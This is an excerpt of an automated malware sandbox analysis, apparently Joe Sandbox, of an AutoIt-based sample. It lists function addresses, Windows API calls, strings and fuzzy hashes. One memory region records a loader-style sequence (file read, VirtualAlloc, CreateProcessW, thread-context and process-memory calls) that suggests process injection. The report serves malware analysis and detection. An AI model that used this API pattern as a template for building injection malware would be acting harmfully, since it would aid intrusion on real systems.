                                                    • Opcode Fuzzy Hash: e7fcc9d0c03c8eebee60ddba528add67e317e316073a556d8272a5bdc8b54fa5
                                                    • Instruction Fuzzy Hash: 67A10974E10309EBEB14CFA4D894BEEB7B5FF48304F248599E501BB280D7759A81CBA4

                                                    Control-flow Graph

                                                    APIs
                                                    • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00653A03
                                                    • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00653A24
                                                    • ShowWindow.USER32(00000000,?,?), ref: 00653A38
                                                    • ShowWindow.USER32(00000000,?,?), ref: 00653A41
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: Window$CreateShow
                                                    • String ID: AutoIt v3$edit
                                                    • API String ID: 1584632944-3779509399
                                                    • Opcode ID: 5802b15383f86f0fd8ea6faa8fd89aa9def4a49d77fb1f50449575f61a434cbc
                                                    • Instruction ID: 54095e54c1fc5f8c4fbf3d730972d82dce779d26e510c3dbc2689820ebdf23d7
                                                    • Opcode Fuzzy Hash: 5802b15383f86f0fd8ea6faa8fd89aa9def4a49d77fb1f50449575f61a434cbc
                                                    • Instruction Fuzzy Hash: 9DF030B2901290BEEA30571BAC08EA73E7EE7C6F60B00C02AB900A21B0C1750801CAB4

                                                    Control-flow Graph

                                                    control_flow_graph 1115 32d23b0-32d24a8 call 32d0000 call 32d22a0 CreateFileW 1122 32d24af-32d24bf 1115->1122 1123 32d24aa 1115->1123 1126 32d24c6-32d24e0 VirtualAlloc 1122->1126 1127 32d24c1 1122->1127 1124 32d255f-32d2564 1123->1124 1128 32d24e4-32d24fb ReadFile 1126->1128 1129 32d24e2 1126->1129 1127->1124 1130 32d24fd 1128->1130 1131 32d24ff-32d2539 call 32d22e0 call 32d12a0 1128->1131 1129->1124 1130->1124 1136 32d253b-32d2550 call 32d2330 1131->1136 1137 32d2555-32d255d ExitProcess 1131->1137 1136->1137 1137->1124
                                                    APIs
                                                      • Part of subcall function 032D22A0: Sleep.KERNELBASE(000001F4), ref: 032D22B1
                                                    • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 032D249E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1379067181.00000000032D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_32d0000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: CreateFileSleep
                                                    • String ID: 5KO70KDT2Q
                                                    • API String ID: 2694422964-157869485
                                                    • Opcode ID: 89e2e7457391da16eb7394dc3497d18d4cc0fa7707ab292215f9414c15cbf066
                                                    • Instruction ID: 5e5fe223719f009732fdc90e293b7c6139c5f08f8d5ddd3b45a49d1088fe742a
                                                    • Opcode Fuzzy Hash: 89e2e7457391da16eb7394dc3497d18d4cc0fa7707ab292215f9414c15cbf066
                                                    • Instruction Fuzzy Hash: B5516031D14309EBEF10DBA4C858BEEBB78AF44300F004599E609BB2C0DBB55B85CBA5

                                                    Control-flow Graph

                                                    control_flow_graph 1139 65407c-654092 1140 65416f-654173 1139->1140 1141 654098-6540ad call 657a16 1139->1141 1144 68d3c8-68d3d7 LoadStringW 1141->1144 1145 6540b3-6540d3 call 657bcc 1141->1145 1148 68d3e2-68d3fa call 657b2e call 656fe3 1144->1148 1145->1148 1149 6540d9-6540dd 1145->1149 1158 6540ed-65416a call 672de0 call 65454e call 672dbc Shell_NotifyIconW call 655904 1148->1158 1161 68d400-68d41e call 657cab call 656fe3 call 657cab 1148->1161 1151 654174-65417d call 658047 1149->1151 1152 6540e3-6540e8 call 657b2e 1149->1152 1151->1158 1152->1158 1158->1140 1161->1158
                                                    APIs
                                                    • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 0068D3D7
                                                      • Part of subcall function 00657BCC: _memmove.LIBCMT ref: 00657C06
                                                    • _memset.LIBCMT ref: 006540FC
                                                    • _wcscpy.LIBCMT ref: 00654150
                                                    • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00654160
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                                    • String ID: Line:
                                                    • API String ID: 3942752672-1585850449
                                                    • Opcode ID: 06b55c601e58204e5cc379db9b86101a1040023531377f1909de835fda950e93
                                                    • Instruction ID: 1581e499b671b0b963f527b9519cab8b306ba57877ef2a0431bde72dee461a6a
                                                    • Opcode Fuzzy Hash: 06b55c601e58204e5cc379db9b86101a1040023531377f1909de835fda950e93
                                                    • Instruction Fuzzy Hash: BD31CFB2008701AFD3A4EB64EC46BDA77DAAF80305F10851EF985921E1DF74968CC79A
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                    • String ID:
                                                    • API String ID: 1559183368-0
                                                    • Opcode ID: dfdd2df0ab245b9716d30a375d324e0946404ce6e082d96a71c3349c3dbc91e5
                                                    • Instruction ID: 0739e1142037659de2b3830179574fe1cbf16c73576be264418fb5f9aad7d766
                                                    • Opcode Fuzzy Hash: dfdd2df0ab245b9716d30a375d324e0946404ce6e082d96a71c3349c3dbc91e5
                                                    • Instruction Fuzzy Hash: EE51C570A00B05DBEB249F69D8805AE77A3AF40321F24C7ADF82E963D4D7B09D918B44
                                                    APIs
                                                      • Part of subcall function 00654DDD: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,007152F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00654E0F
                                                    • _free.LIBCMT ref: 0068E263
                                                    • _free.LIBCMT ref: 0068E2AA
                                                      • Part of subcall function 00656A8C: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00656BAD
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: _free$CurrentDirectoryLibraryLoad
                                                    • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                    • API String ID: 2861923089-1757145024
                                                    • Opcode ID: 6334cf637708794971f69b34ea2c7a26788549cd5dc5eba189cc8d411cc580bb
                                                    • Instruction ID: 953b87d2029ab09fc839dbf6b9215c228dd650b6f427cba1dc59c52f45cab4a3
                                                    • Opcode Fuzzy Hash: 6334cf637708794971f69b34ea2c7a26788549cd5dc5eba189cc8d411cc580bb
                                                    • Instruction Fuzzy Hash: 23918C719002199FCF44EFA4CC919EDB7BAFF04310F00462EF816AB2A1DB75AA55CB64
                                                    APIs
                                                    • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,006535A1,SwapMouseButtons,00000004,?), ref: 006535D4
                                                    • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,006535A1,SwapMouseButtons,00000004,?,?,?,?,00652754), ref: 006535F5
                                                    • RegCloseKey.KERNELBASE(00000000,?,?,006535A1,SwapMouseButtons,00000004,?,?,?,?,00652754), ref: 00653617
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: CloseOpenQueryValue
                                                    • String ID: Control Panel\Mouse
                                                    • API String ID: 3677997916-824357125
                                                    • Opcode ID: e408efd18544ad542937ecbc7c56b75d3567b552332d764e02a19a301bfd28f7
                                                    • Instruction ID: c74240182437a8558084735fcd9eb749679408b0506da973935421e6e5d774d0
                                                    • Opcode Fuzzy Hash: e408efd18544ad542937ecbc7c56b75d3567b552332d764e02a19a301bfd28f7
                                                    • Instruction Fuzzy Hash: 62115A71911228BFDB208F64DC40EEEB7BAEF04B81F00946AF805D7310D2719F549760
                                                    APIs
                                                    • CreateProcessW.KERNELBASE(?,00000000), ref: 032D1A5B
                                                    • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 032D1AF1
                                                    • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 032D1B13
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1379067181.00000000032D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_32d0000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                    • String ID:
                                                    • API String ID: 2438371351-0
                                                    • Opcode ID: f7a3111ab7015fd8b62422fe8fc399687c9bf18e9b49b2a513bdf356eeec8a8c
                                                    • Instruction ID: 145ec3c01bc2945131ba53802a9516e10b772bd9169e9253901e0ea04d83d2e1
                                                    • Opcode Fuzzy Hash: f7a3111ab7015fd8b62422fe8fc399687c9bf18e9b49b2a513bdf356eeec8a8c
                                                    • Instruction Fuzzy Hash: 80621C30A24258DBEB24CFA4C850BDEB376EF58300F1091A9D10DEB794E7B59E91CB59
                                                    APIs
                                                      • Part of subcall function 00654EE5: _fseek.LIBCMT ref: 00654EFD
                                                      • Part of subcall function 006B9734: _wcscmp.LIBCMT ref: 006B9824
                                                      • Part of subcall function 006B9734: _wcscmp.LIBCMT ref: 006B9837
                                                    • _free.LIBCMT ref: 006B96A2
                                                    • _free.LIBCMT ref: 006B96A9
                                                    • _free.LIBCMT ref: 006B9714
                                                      • Part of subcall function 00672D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00679A24), ref: 00672D69
                                                      • Part of subcall function 00672D55: GetLastError.KERNEL32(00000000,?,00679A24), ref: 00672D7B
                                                    • _free.LIBCMT ref: 006B971C
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                    • String ID:
                                                    • API String ID: 1552873950-0
                                                    • Opcode ID: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
                                                    • Instruction ID: b6cc7fee03474d54c233ba677d8d19dd0aa0126a66400264778a2b2fa1ddaa7b
                                                    • Opcode Fuzzy Hash: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
                                                    • Instruction Fuzzy Hash: 2D514CB1904219AFDF649F64CC85ADEBBBAEF48304F1044AEF60DA3241DB715A91CF58
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                    • String ID:
                                                    • API String ID: 2782032738-0
                                                    • Opcode ID: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                                    • Instruction ID: 115c0f763891cf23fc88a57e6813349d000593dbe264fb09670ee610b452ab58
                                                    • Opcode Fuzzy Hash: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                                    • Instruction Fuzzy Hash: 7841A275A007499BDB1CCEA9C8889AE77A7AF42360B24C57DE81DCB740EF70DD418B45
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: _memmove
                                                    • String ID: AU3!P/n$EA06
                                                    • API String ID: 4104443479-1756779138
                                                    • Opcode ID: 04158e4b701f919bf29f62ccb8e7aea9151240352b877bd6a38683bb61383118
                                                    • Instruction ID: b20c9fa0bedeb6f65802016680ab4a004f5335f503136815a4c9fe2f1179e71d
                                                    • Opcode Fuzzy Hash: 04158e4b701f919bf29f62ccb8e7aea9151240352b877bd6a38683bb61383118
                                                    • Instruction Fuzzy Hash: 75417D21A0415867DF219B548C927FE7FB39F4530AF2842F9EC829B382DE245DCD83A1
                                                    APIs
                                                    • _memset.LIBCMT ref: 0068EA39
                                                    • GetOpenFileNameW.COMDLG32(?), ref: 0068EA83
                                                      • Part of subcall function 00654750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00654743,?,?,006537AE,?), ref: 00654770
                                                      • Part of subcall function 00670791: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 006707B0
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: Name$Path$FileFullLongOpen_memset
                                                    • String ID: X
                                                    • API String ID: 3777226403-3081909835
                                                    • Opcode ID: 11cca7e426d56530ef8958e8dbd579305025c97c6da3fc612235d7ac934e5e1f
                                                    • Instruction ID: 82c395145e73dd42aa8ffdca591ff76bf2a22413eca16a16f320b3df826e5814
                                                    • Opcode Fuzzy Hash: 11cca7e426d56530ef8958e8dbd579305025c97c6da3fc612235d7ac934e5e1f
                                                    • Instruction Fuzzy Hash: 2C21F670A102489BCB819F94D845BDE7BFEAF49701F008059E848A7281DFB4598DCFA5
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: __fread_nolock_memmove
                                                    • String ID: EA06
                                                    • API String ID: 1988441806-3962188686
                                                    • Opcode ID: 6131b89fcbf4018938681a0abbd6e5e5163940f5aca894fa37d1614b50b15b0e
                                                    • Instruction ID: 5158c015b82c1c3d8e7c63bb4aafcb391b9d4c43e2b167ecba1abc71b45346c9
                                                    • Opcode Fuzzy Hash: 6131b89fcbf4018938681a0abbd6e5e5163940f5aca894fa37d1614b50b15b0e
                                                    • Instruction Fuzzy Hash: 3D01F9718042187EDB58CBA8C816EEE7BFCDF11301F00419FF596D31C1E9B5A6048B60
                                                    APIs
                                                    • GetTempPathW.KERNEL32(00000104,?), ref: 006B98F8
                                                    • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 006B990F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: Temp$FileNamePath
                                                    • String ID: aut
                                                    • API String ID: 3285503233-3010740371
                                                    • Opcode ID: 630748e8568eb44f844f97ded47f1dc337492357564295577b534334295975ca
                                                    • Instruction ID: 06bcd2d9b2531c5c5d17d7004d8a25083556aac619af009970d8873a8dab5de4
                                                    • Opcode Fuzzy Hash: 630748e8568eb44f844f97ded47f1dc337492357564295577b534334295975ca
                                                    • Instruction Fuzzy Hash: A6D05E7994130DABDB50DBE0DC0EFAA777CE704700F0042B2BA95911E1EAB096988B95
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6b077f1b8c49e04c48c5a3052ddb422769f0fba9b4f1a4ac6cf47963c61ef70e
                                                    • Instruction ID: d32af92425e1480d68a28cee6a10929a11256350334c42c0e6f6cec70d760408
                                                    • Opcode Fuzzy Hash: 6b077f1b8c49e04c48c5a3052ddb422769f0fba9b4f1a4ac6cf47963c61ef70e
                                                    • Instruction Fuzzy Hash: 58F14A716083409FC754DF28C484A6ABBE6FF89324F14896EF89A9B351D730E945CF92
                                                    APIs
                                                    • _memset.LIBCMT ref: 00654370
                                                    • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00654415
                                                    • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00654432
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: IconNotifyShell_$_memset
                                                    • String ID:
                                                    • API String ID: 1505330794-0
                                                    • Opcode ID: 87bb6e9c25725c01e29536055ad052811ded973d3c24898c0cbd71ce08c518c4
                                                    • Instruction ID: 8d62707631603e4b0bd5f54c86ecc5b7dc3ba9f5f22a7c571b764ebb9bea823e
                                                    • Opcode Fuzzy Hash: 87bb6e9c25725c01e29536055ad052811ded973d3c24898c0cbd71ce08c518c4
                                                    • Instruction Fuzzy Hash: 0831A0B1505701CFC724DF24D8846DBBBF9FB48309F00496EE98A82291DB74A988CB56
                                                    APIs
                                                    • __FF_MSGBANNER.LIBCMT ref: 00675733
                                                      • Part of subcall function 0067A16B: __NMSG_WRITE.LIBCMT ref: 0067A192
                                                      • Part of subcall function 0067A16B: __NMSG_WRITE.LIBCMT ref: 0067A19C
                                                    • __NMSG_WRITE.LIBCMT ref: 0067573A
                                                      • Part of subcall function 0067A1C8: GetModuleFileNameW.KERNEL32(00000000,007133BA,00000104,?,00000001,00000000), ref: 0067A25A
                                                      • Part of subcall function 0067A1C8: ___crtMessageBoxW.LIBCMT ref: 0067A308
                                                      • Part of subcall function 0067309F: ___crtCorExitProcess.LIBCMT ref: 006730A5
                                                      • Part of subcall function 0067309F: ExitProcess.KERNEL32 ref: 006730AE
                                                      • Part of subcall function 00678B28: __getptd_noexit.LIBCMT ref: 00678B28
                                                    • RtlAllocateHeap.NTDLL(00E00000,00000000,00000001,00000000,?,?,?,00670DD3,?), ref: 0067575F
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                    • String ID:
                                                    • API String ID: 1372826849-0
                                                    • Opcode ID: a4eccdf441d3b818fe4e586813ce2b2f30a11f5199f5ec2312c3f8cb1bfaef1a
                                                    • Instruction ID: 672f995dc7040f0b4d3927401a436501a37bb2ef5f160c14c949129cf3b9a3e6
                                                    • Opcode Fuzzy Hash: a4eccdf441d3b818fe4e586813ce2b2f30a11f5199f5ec2312c3f8cb1bfaef1a
                                                    • Instruction Fuzzy Hash: A401F531240B11DEE6587778EC46AAE734B9B82762F10C169F40EEB3C1DFF49C414669
                                                    APIs
                                                    • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,006B9548,?,?,?,?,?,00000004), ref: 006B98BB
                                                    • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,006B9548,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 006B98D1
                                                    • CloseHandle.KERNEL32(00000000,?,006B9548,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 006B98D8
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: File$CloseCreateHandleTime
                                                    • String ID:
                                                    • API String ID: 3397143404-0
                                                    • Opcode ID: 0fe9c937d7ba24e25e444c8e6da4b3ab0bcea3c823ed8acadf78e0438fd7702e
                                                    • Instruction ID: f9978b7f8bc20aee8aa26878b15cefe784ff58e8850f812532cc14a85d77c4aa
                                                    • Opcode Fuzzy Hash: 0fe9c937d7ba24e25e444c8e6da4b3ab0bcea3c823ed8acadf78e0438fd7702e
                                                    • Instruction Fuzzy Hash: 4DE08632581224B7D7211B54EC09FDA7F1AAF06760F114121FB15691E087B1161197D8
                                                    APIs
                                                    • _free.LIBCMT ref: 006B8D1B
